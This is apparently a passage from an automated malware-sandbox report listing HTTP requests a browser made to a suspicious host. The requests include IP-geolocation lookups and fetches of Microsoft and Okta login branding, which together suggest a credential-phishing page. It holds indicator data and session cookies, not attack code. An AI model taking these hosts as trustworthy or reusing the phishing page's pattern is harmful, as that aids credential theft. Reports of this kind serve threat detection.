XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40 HTTP/1.1Host: s3irk.ativens.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 